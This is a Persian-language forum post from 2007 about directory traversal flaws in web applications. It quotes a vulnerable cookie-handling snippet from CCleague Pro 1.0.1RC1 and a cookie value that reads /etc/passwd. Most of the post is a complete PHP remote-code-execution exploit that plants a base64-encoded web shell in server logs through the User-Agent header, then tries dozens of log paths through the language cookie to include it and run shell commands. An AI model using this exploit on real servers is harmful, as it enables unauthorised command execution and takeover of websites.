سه شنبه 23 مرداد 1386, 1:41 قبلازظهر
توضیح : مقاله به بررسی آسیب پذیری پیمایش دایرکتوری ها میپردازیم . آن را در برنامه های وب نوشته شده با زبان های PHP ، CGI ، Java و HTML تحلیل میکنیم.
مثال:
آسیب پذیر ی در برنامه CCleaguePro_V1.0.1RC1.
کد آسیب پذیر :
مثال:
آسیب پذیر ی در برنامه CCleaguePro_V1.0.1RC1.
کد آسیب پذیر :
if($_COOKIE["language"]) {
$llang = $_COOKIE["language"];
}
else
{
$l_array = explode("-",$lang_array[0]);
$llang = $l_array[0];
setcookie("language",$llang,time()+1209600,"","","");
}
include("lang/".$llang.".php");
طریقه استفاده از آسیب پذیری:
نقل قول:
Ex:
open cookies and find portal cookies,chang this in first line(use opera for changing,is too easy whit opera!==>tools==>advance==>cookies):
---------------cut here --------------->
language
en
to
language
../../../../../../../../../etc/passwd%00
open cookies and find portal cookies,chang this in first line(use opera for changing,is too easy whit opera!==>tools==>advance==>cookies):
---------------cut here --------------->
language
en
to
language
../../../../../../../../../etc/passwd%00
و کد های مخرب برای آشنایی بیشتر :
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
-----------------------------------------
[Unkn0wn Security Researcher]
CCleague Pro v1.0.1RC1 Remote Code Execution
C0de by Snake
Snake[dot]Apollyon[at]Gmail[dot]com
www.Unkn0wn.sub.ir
-----------------------------------------
Notice: work whit register_globals=On and magic quotes = off
Vulnerable code is in index.php & some 0ther pageZ
in line 27-35 :
--------------------------------------
if($_COOKIE["language"]) {
$llang = $_COOKIE["language"];
}
else
{
$l_array = explode("-",$lang_array[0]);
$llang = $l_array[0];
setcookie("language",$llang,time()+1209600,"","","");
}
include("lang/".$llang.".php");
------------------------------------------
Ex:
open cookies and find portal cookies
chang this in first line
(use opera for changing,is too easy whit opera!==>tools==>advance==>cookies):
---------------cut here --------------->
language
en
to
language
../../../../../../../../../etc/passwd%00
---------------cut here ---------------<
*/
//N0w Start
error_reporting(0);
set_time_limit(0);
echo " [CCleague Pro Sports CMS 1.0.1RC1 Remote Code Execution]\n".
" [Code By Snake <Snake[dot]Apollyon[at]Gmail[dot]com>]\n";
if ($argc!=4){
echo "Usage:
".$argv[0]." <Host> <Port> <Path> <Cmd>
<Host> Potal Host
<Port> other than 80 ,if you let this ,post is 80
<Path> Path to Portal
<Cmd> Shell command\n
Ex :
".$argv[0]." www.example.ir /CCleaguePro/ ls -al";
exit(0);
}
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$cmd=$argv[4];
if (!isset($port)){
$port = 80;
}
function baghali($host, $packet){
global $data;
$fp=fsockopen($host , $port, $errno, $errstr) || die("failed.\nReason: " . $errno . " - " . $errstr);
fputs($fp, $packet);
while(!feof($fp)) {
$data .=fgets($fp);
}
fclose($fp);
return $data;
}
echo "[ * ] Connected to ".$host."\n\n";
print "[ * ] Injecting some code into log files ...\r\n";
$code = base64_decode( "PD9waHAgaWYoJF9TRVJWRVJbSFRUUF9DTURdKXsg ZWNobyBjbWR4cGxzdGFydC5zaGVsbF9leGVjKHN0 cmlwc2xhc2hlcygkX1NFUlZFUltIVFRQX0NNRF0p KS5jbWR4cGxlbmQ7IH0gPz4=");
$packet ="GET ".$path.$code." HTTP/1.1\r\n";
$packet .="User-Agent: ".$code."\r\n";
$packet .="Host: ".$host."\r\n";
$packet .="Connection: close\r\n\r\n";
baghali($host, $packet);
$logs = array("../../../../../var/log/httpd/access_log" ,
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../apache2/logs/access_log",
"../../apache2/logs/error_log",
"../../../../../../../apache2/logs/access_log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log",
"../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../var/log/httpd/error_log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../apache2/logs/access_log",
"../../../../../../apache2/logs/error_log",
"../../../../../../../../../../../apache2/logs/access_log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../logs/error.log",
"../../../../../../../../../logs/access.log",
"../../../../../../../../../etc/httpd/logs/access_log",
"../../../../../../../../../etc/httpd/logs/access.log",
"../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../var/log/access_log",
"../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../var/log/access_log",
"../../../../../../../../../var/log/error_log");
$i = 0;
foreach($logs as $value){
$logs[$i++];
$packet ="GET ".$path."index.php HTTP/1.0\r\n";
$packet .="User-Agent: Googlebot/2.1\r\n";
$packet .="Host: ".$host."\r\n";
$packet .="Cookie: language=".$logs[$i]."%00;\r\n";
$packet .="CMD: $cmd\r\n";
$packet .="Connection: Close\r\n\r\n";
baghali($host, $packet);
echo("Trying $logs[$i]..\n");
$adata = explode( "cmdxplstart",$data);
$bdata = explode( "cmdxplend",$adata[1]);
$cdata = $bdata[0];
if(eregi("cmdxplend", $data)){
if($cdata==NULL){
die("\nExploit succeeded but blank command received..\n");
}
die("\nExploit Succeeded!\n\nCommand Resolution:\n$cdata\n");
}
}
}
die("Exploit failed..");
?>